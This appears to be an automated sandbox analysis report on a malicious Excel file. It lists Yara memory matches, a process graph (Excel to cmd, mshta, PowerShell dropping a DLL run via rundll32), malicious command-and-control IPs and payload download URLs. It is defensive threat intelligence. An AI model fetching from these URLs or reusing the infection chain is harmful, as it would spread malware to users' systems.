Source: Yara match File source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562407 Sample: DETAILS-145.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->49 51 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->51 53 31 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\DETAILS-145.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.168, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 jeffreylubin.igclout.com 74.208.236.157, 49170, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->57 59 kuyporn.com 172.67.149.209, 49169, 80 CLOUDFLARENETUS United States 23->59 45 C:\ProgramData\QWER.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\cekfidpy.yhq (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.148.81.119
 unknown United States
20473 AS-CHOOPAUS true
104.131.62.48
 unknown United States
14061 DIGITALOCEAN-ASNUS true
198.199.98.78
 unknown United States
14061 DIGITALOCEAN-ASNUS true
194.9.172.107
 unknown unknown
207992 FEELBFR true
59.148.253.194
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK true
74.207.230.120
 unknown United States
63949 LINODE-APLinodeLLCUS true
103.41.204.169
 unknown Indonesia
58397 INFINYS-AS-IDPTInfinysSystemIndonesiaID true
85.214.67.203
 unknown Germany
6724 STRATOSTRATOAGDE true
191.252.103.16
 unknown Brazil
27715 LocawebServicosdeInternetSABR true
168.197.250.14
 unknown Argentina
264776 OmarAnselmoRipollTDCNETAR true
185.148.168.15
 unknown Germany
44780 EVERSCALE-ASDE true
66.42.57.149
 unknown United States
20473 AS-CHOOPAUS true
91.240.118.168
 unknown unknown
49453 GLOBALLAYERNL true
139.196.72.155
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
217.182.143.207
 unknown France
16276 OVHFR true
203.153.216.46
 unknown Indonesia
45291 SURF-IDPTSurfindoNetworkID true
159.69.237.188
 unknown Germany
24940 HETZNER-ASDE true
116.124.128.206
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
37.59.209.141
 unknown France
16276 OVHFR true
78.46.73.125
 unknown Germany
24940 HETZNER-ASDE true
210.57.209.142
 unknown Indonesia
38142 UNAIR-AS-IDUniversitasAirlanggaID true
172.67.149.209
 kuyporn.com United States
13335 CLOUDFLARENETUS false
185.148.168.220
 unknown Germany
44780 EVERSCALE-ASDE true
74.208.236.157
 jeffreylubin.igclout.com United States
8560 ONEANDONE-ASBrauerstrasse48DE false
54.37.228.122
 unknown France
16276 OVHFR true
185.168.130.138
 unknown Ukraine
49720 GIGACLOUD-ASUA true
190.90.233.66
 unknown Colombia
18678 INTERNEXASAESPCO true
142.4.219.173
 unknown Canada
16276 OVHFR true
54.38.242.185
 unknown France
16276 OVHFR true
195.154.146.35
 unknown France
12876 OnlineSASFR true
195.77.239.39
 unknown Spain
60493 FICOSA-ASES true
78.47.204.80
 unknown Germany
24940 HETZNER-ASDE true
118.98.72.86
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
37.44.244.177
 unknown Germany
47583 AS-HOSTINGERLT true
62.171.178.147
 unknown United Kingdom
51167 CONTABODE true
128.199.192.135
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
kuyporn.com 172.67.149.209 true
jeffreylubin.igclout.com 74.208.236.157 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://jeffreylubin.igclout.com/wp-admin/vzOG/ true
  • Avira URL Cloud: malware
 unknown
http://kuyporn.com/wp-content/XSs5/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/qqw/aas/se.html true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/qqw/aas/se.png true
  • Avira URL Cloud: malware
 unknown